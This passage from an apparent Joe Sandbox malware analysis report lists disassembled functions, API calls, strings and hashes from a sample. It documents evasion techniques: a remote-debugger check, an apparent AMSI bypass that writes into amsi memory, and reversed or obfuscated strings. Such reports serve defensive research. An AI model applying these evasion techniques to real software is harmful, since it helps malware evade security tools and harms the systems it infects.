irtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                      • API String ID: 2010126900-181751239
                      • Opcode ID: 5813e85a08dc4387c5fcc790eb5b0a3370ee44a102996e02d71d684948b255bb
                      • Instruction ID: 867cdf5c8447e0f8dfcd9ff81551096788880f8d13c0ebb749c32aa1c223154c
                      • Opcode Fuzzy Hash: 5813e85a08dc4387c5fcc790eb5b0a3370ee44a102996e02d71d684948b255bb
                      • Instruction Fuzzy Hash: 76240D7DA101188FDF11EB68DC90ADE73BABF95304F1480A5E409EB755DE70AE868F12
                      Function 02895A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5547 2895a78-2895ab9 GetModuleFileNameA RegOpenKeyExA 5548 2895afb-2895b3e call 28958b4 RegQueryValueExA 5547->5548 5549 2895abb-2895ad7 RegOpenKeyExA 5547->5549 5554 2895b40-2895b5c RegQueryValueExA 5548->5554 5555 2895b62-2895b7c RegCloseKey 5548->5555 5549->5548 5550 2895ad9-2895af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2895b84-2895bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5556 2895bbb-2895bbf 5552->5556 5557 2895c9e-2895ca5 5552->5557 5554->5555 5558 2895b5e 5554->5558 5560 2895bcb-2895be1 lstrlenA 5556->5560 5561 2895bc1-2895bc5 5556->5561 5558->5555 5562 2895be4-2895be7 5560->5562 5561->5557 5561->5560 5563 2895be9-2895bf1 5562->5563 5564 2895bf3-2895bfb 5562->5564 5563->5564 5565 2895be3 5563->5565 5564->5557 5566 2895c01-2895c06 5564->5566 5565->5562 5567 2895c08-2895c2e lstrcpynA LoadLibraryExA 5566->5567 5568 2895c30-2895c32 5566->5568 5567->5568 5568->5557 5569 2895c34-2895c38 5568->5569 5569->5557 5570 2895c3a-2895c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5557 5571 2895c6c-2895c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5557
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02890000,028BE790), ref: 02895A94
                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AB2
                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02890000,028BE790), ref: 02895AD0
                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02895AEE
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02895B37
                      • RegQueryValueExA.ADVAPI32(?,02895CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02895B7D,?,80000001), ref: 02895B55
                      • RegCloseKey.ADVAPI32(?,02895B84,00000000,?,?,00000000,02895B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02895B77
                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02895B94
                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02895BA1
                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02895BA7
                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02895BD2
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C19
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C29
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C51
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C61
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02895C87
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02895C97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                      • API String ID: 1759228003-2375825460
                      • Opcode ID: c5a10660772ec5118436fc37017ad2d9d495dd458bdf48b628ef0cad6309370b
                      • Instruction ID: 8f65c3e1e3992cae2aa67012f741f8466e5aea28d3837c9e2a60d820670829b9
                      • Opcode Fuzzy Hash: c5a10660772ec5118436fc37017ad2d9d495dd458bdf48b628ef0cad6309370b
                      • Instruction Fuzzy Hash: 7051787DA4420D7EFF22D6E8CC46FEF77AD9B04744F8801A1A608E6181D7789A44CF65
                      Function 028AF024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5647 28af024-28af03e GetModuleHandleW 5648 28af06a-28af072 5647->5648 5649 28af040-28af052 GetProcAddress 5647->5649 5649->5648 5650 28af054-28af064 CheckRemoteDebuggerPresent 5649->5650 5650->5648 5651 28af066 5650->5651 5651->5648
                      APIs
                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 028AF034
                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 028AF046
                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 028AF05D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                      • API String ID: 35162468-539270669
                      • Opcode ID: 5a773c20094f080b5ad256b6c299d932c7bbd5caec3ab5b1f2b063b7e459c605
                      • Instruction ID: 91c225186d24f3383f22954edcefcb320625290f0ae50a9c0bd74885cf7bdd33
                      • Opcode Fuzzy Hash: 5a773c20094f080b5ad256b6c299d932c7bbd5caec3ab5b1f2b063b7e459c605
                      • Instruction Fuzzy Hash: 9BF0273C900218AAEB10B6A888897DCFBB85B25328F2403C0A524E21C1EBB60640C651
                      Function 028ADFE4 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02894ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02894EDA
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE01F
                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028AE0B4), ref: 028AE04F
                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028AE064
                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028AE090
                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028AE099
                        • Part of subcall function 02894C0C: SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                      • String ID:
                      • API String ID: 1897104825-0
                      • Opcode ID: f954ea7605fa7bb0fc11fc9e17bdb89ba900f9ad1ae75534424a5c4366f67f8e
                      • Instruction ID: 6f4c018b652a04c300adc75c221fba60f632c66b6af9fa9a1d7e3d8b27cc849b
                      • Opcode Fuzzy Hash: f954ea7605fa7bb0fc11fc9e17bdb89ba900f9ad1ae75534424a5c4366f67f8e
                      • Instruction Fuzzy Hash: 2F21C47D6403087AEB11EAD8CC56FDE77BDAB08704F540461B600F71D0DAB4AA058B66
                      Function 028AE72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028AE86A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CheckConnectionInternet
                      • String ID: Initialize$OpenSession$ScanBuffer
                      • API String ID: 3847983778-3852638603
                      • Opcode ID: ca0f9588bd77da5d9df68d46a2efa60626ce0f695d9f075a53f4797213397fa6
                      • Instruction ID: f1b1387d56e08cc5fea56221b1ef21ed3b3cee1f17b2069f58ad6ccac3edd5d9
                      • Opcode Fuzzy Hash: ca0f9588bd77da5d9df68d46a2efa60626ce0f695d9f075a53f4797213397fa6
                      • Instruction Fuzzy Hash: 56410A7DA101089FFF11EBA8D8A0A9EB7FAEF48710F254831E401E7251DE74A9068F12
                      Function 028A7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 028A8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,028A8088,?,?,00000000,?,028A79FE,ntdll,00000000,00000000,028A7A43,?,?,00000000), ref: 028A8056
                        • Part of subcall function 028A8018: GetModuleHandleA.KERNELBASE(?), ref: 028A806A
                        • Part of subcall function 028A80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(?,?), ref: 028A8125
                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                      • String ID: Ntdll$yromeMlautriVetirW
                      • API String ID: 2719805696-3542721025
                      • Opcode ID: b140050f15be14fe075c431069f2be2a0b7822719dc21eb5ac27de09cf8e5d1e
                      • Instruction ID: d852b231e5317e0a1ec5e80c405071b379aa2610cef21b824518d708940e017d
                      • Opcode Fuzzy Hash: b140050f15be14fe075c431069f2be2a0b7822719dc21eb5ac27de09cf8e5d1e
                      • Instruction Fuzzy Hash: 9201807C600208AFEB40EFA8D861E9EB7EDEB4C700F514850BA00D3694CA34AD119B61
                      Function 028A6D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 028A6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,028A6D39,?,?,?,00000000), ref: 028A6D19
                      • CoCreateInstance.OLE32(?,00000000,00000005,028A6E2C,00000000,00000000,028A6DAB,?,00000000,028A6E1B), ref: 028A6D97
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CreateFromInstanceProg
                      • String ID:
                      • API String ID: 2151042543-0
                      • Opcode ID: 5dd1d137df8e2e959b2d12338ddd1a410a4d10a8c04af24e6bee2c9dc37fdee3
                      • Instruction ID: d1cde92b92c1b9c993f1588aa862f5a48c6feff3d7ac967804f7b170f47e8e53
                      • Opcode Fuzzy Hash: 5dd1d137df8e2e959b2d12338ddd1a410a4d10a8c04af24e6bee2c9dc37fdee3
                      • Instruction Fuzzy Hash: CD01F77D608704AEFF15DF68DC3286F7BADE749B10BA60835F501D2640FA359910C865
                      Function 02891724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5572 2891724-2891736 5573 2891968-289196d 5572->5573 5574 289173c-289174c 5572->5574 5577 2891a80-2891a83 5573->5577 5578 2891973-2891984 5573->5578 5575 289174e-289175b 5574->5575 5576 28917a4-28917ad 5574->5576 5579 289175d-289176a 5575->5579 5580 2891774-2891780 5575->5580 5576->5575 5583 28917af-28917bb 5576->5583 5584 2891a89-2891a8b 5577->5584 5585 2891684-28916ad VirtualAlloc 5577->5585 5581 2891938-2891945 5578->5581 5582 2891986-28919a2 5578->5582 5586 289176c-2891770 5579->5586 5587 2891794-28917a1 5579->5587 5591 28917f0-28917f9 5580->5591 5592 2891782-2891790 5580->5592 5581->5582 5588 2891947-289195b Sleep 5581->5588 5593 28919b0-28919bf 5582->5593 5594 28919a4-28919ac 5582->5594 5583->5575 5595 28917bd-28917c9 5583->5595 5589 28916df-28916e5 5585->5589 5590 28916af-28916dc call 2891644 5585->5590 5588->5582 5598 289195d-2891964 Sleep 5588->5598 5590->5589 5596 28917fb-2891808 5591->5596 5597 289182c-2891836 5591->5597 5601 28919d8-28919e0 5593->5601 5602 28919c1-28919d5 5593->5602 5600 2891a0c-2891a22 5594->5600 5595->5575 5603 28917cb-28917de Sleep 5595->5603 5596->5597 5604 289180a-289181e Sleep 5596->5604 5605 28918a8-28918b4 5597->5605 5606 2891838-2891863 5597->5606 5598->5581 5607 2891a3b-2891a47 5600->5607 5608 2891a24-2891a32 5600->5608 5611 28919fc-28919fe call 28915cc 5601->5611 5612 28919e2-28919fa 5601->5612 5602->5600 5603->5575 5610 28917e4-28917eb Sleep 5603->5610 5604->5597 5615 2891820-2891827 Sleep 5604->5615 5621 28918dc-28918eb call 28915cc 5605->5621 5622 28918b6-28918c8 5605->5622 5616 289187c-289188a 5606->5616 5617 2891865-2891873 5606->5617 5619 2891a49-2891a5c 5607->5619 5620 2891a68 5607->5620 5608->5607 5618 2891a34 5608->5618 5610->5576 5613 2891a03-2891a0b 5611->5613 5612->5613 5615->5596 5625 28918f8 5616->5625 5626 289188c-28918a6 call 2891500 5616->5626 5617->5616 5624 2891875 5617->5624 5618->5607 5627 2891a6d-2891a7f 5619->5627 5628 2891a5e-2891a63 call 2891500 5619->5628 5620->5627 5632 28918fd-2891936 5621->5632 5635 28918ed-28918f7 5621->5635 5629 28918ca 5622->5629 5630 28918cc-28918da 5622->5630 5624->5616 5625->5632 5626->5632 5628->5627 5629->5630 5630->5632
                      APIs
                      • Sleep.KERNEL32(00000000,?,02891FC1), ref: 028917D0
                      • Sleep.KERNEL32(0000000A,00000000,?,02891FC1), ref: 028917E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 44d1dfb65ba2b6718b34be02021fd638015b251b129e04c03b58feaf56a8d51a
                      • Instruction ID: 41796b5908874d2f7cf0e83bbdda91af4972111e6dadb5bf10be7418b024284d
                      • Opcode Fuzzy Hash: 44d1dfb65ba2b6718b34be02021fd638015b251b129e04c03b58feaf56a8d51a
                      • Instruction Fuzzy Hash: D5B1117EA082928BCF15CF68E888365BBE1EB95314F0C86AAD51DCF3C5C7709551CB90
                      Function 028A8704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • LoadLibraryW.KERNEL32(amsi), ref: 028A870D
                        • Part of subcall function 028A80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028A8148,?,?,00000000,00000000,?,028A8061,00000000,KernelBASE,00000000,00000000,028A8088), ref: 028A810D
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028A8113
                        • Part of subcall function 028A80C0: GetProcAddress.KERNEL32(?,?), ref: 028A8125
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 028A876C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                      • String ID: DllGetClassObject$W$amsi
                      • API String ID: 941070894-2671292670
                      • Opcode ID: 0b7d4311054d3aaa2455a63f4782e71b09492b5c48065cfe2f9443b985fbaf94
                      • Instruction ID: e207ea14fedf3c77197d0b794a7fbea1f8695b68101352e7aacfb77423be8a36
                      • Opcode Fuzzy Hash: 0b7d4311054d3aaa2455a63f4782e71b09492b5c48065cfe2f9443b985fbaf94
                      • Instruction Fuzzy Hash: 32F0A45854C381B9F201E6788C55F4FBECD4B51224F048A08B1E8D62D2DA79D10497B7
                      Function 02891A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5652 2891a8c-2891a9b 5653 2891b6c-2891b6f 5652->5653 5654 2891aa1-2891aa5 5652->5654 5655 2891c5c-2891c60 5653->5655 5656 2891b75-2891b7f 5653->5656 5657 2891b08-2891b11 5654->5657 5658 2891aa7-2891aae 5654->5658 5659 28916e8-289170b call 2891644 VirtualFree 5655->5659 5660 2891c66-2891c6b 5655->5660 5662 2891b3c-2891b49 5656->5662 5663 2891b81-2891b8d 5656->5663 5657->5658 5661 2891b13-2891b27 Sleep 5657->5661 5664 2891adc-2891ade 5658->5664 5665 2891ab0-2891abb 5658->5665 5681 289170d-2891714 5659->5681 5682 2891716 5659->5682 5661->5658 5669 2891b2d-2891b38 Sleep 5661->5669 5662->5663 5670 2891b4b-2891b5f Sleep 5662->5670 5671 2891b8f-2891b92 5663->5671 5672 2891bc4-2891bd2 5663->5672 5666 2891ae0-2891af1 5664->5666 5667 2891af3 5664->5667 5673 2891abd-2891ac2 5665->5673 5674 2891ac4-2891ad9 5665->5674 5666->5667 5675 2891af6-2891b03 5666->5675 5667->5675 5669->5657 5670->5663 5679 2891b61-2891b68 Sleep 5670->5679 5677 2891b96-2891b9a 5671->5677 5676 2891bd4-2891bd9 call 28914c0 5672->5676 5672->5677 5675->5656 5676->5677 5683 2891bdc-2891be9 5677->5683 5684 2891b9c-2891ba2 5677->5684 5679->5662 5688 2891719-2891723 5681->5688 5682->5688 5683->5684 5689 2891beb-2891bf2 call 28914c0 5683->5689 5685 2891bf4-2891bfe 5684->5685 5686 2891ba4-2891bc2 call 2891500 5684->5686 5692 2891c2c-2891c59 call 2891560 5685->5692 5693 2891c00-2891c28 VirtualFree 5685->5693 5689->5684
                      APIs
                      • Sleep.KERNEL32(00000000,?,?,00000000,02891FE4), ref: 02891B17
                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02891FE4), ref: 02891B31
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 97147427dcb6ff5da263e351d7d3eb4857b90631b72b5d34e37d3a1cb1cc8d11
                      • Instruction ID: 363c94973b6a6560944d6ff3b00fc83854ca92a004a8506a2b92ae0526eba0d4
                      • Opcode Fuzzy Hash: 97147427dcb6ff5da263e351d7d3eb4857b90631b72b5d34e37d3a1cb1cc8d11
                      • Instruction Fuzzy Hash: AA51ED7DA092428FDF16CF6CD988766BBD1AB45318F1C81AEE44CCB2C6E7708845CB91
                      Function 028AE72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028AE86A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: CheckConnectionInternet
                      • String ID: Initialize$OpenSession$ScanBuffer
                      • API String ID: 3847983778-3852638603
                      • Opcode ID: 94bf49c1ffdcf62f3068745c150f06fcd39a4cf22c36cfd1af21d46215984209
                      • Instruction ID: 3361fda33f7a66e295ec2761b6d9927a6fc0150791022f1a6ad65828bfe4ddad
                      • Opcode Fuzzy Hash: 94bf49c1ffdcf62f3068745c150f06fcd39a4cf22c36cfd1af21d46215984209
                      • Instruction Fuzzy Hash: 87410B7DA101089FFF11EBA8D8A0A9EB7FAEF48710F254831E401E7251DE74AD068F12
                      Function 028A881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                      • GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      • FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                      Memory Dump Source
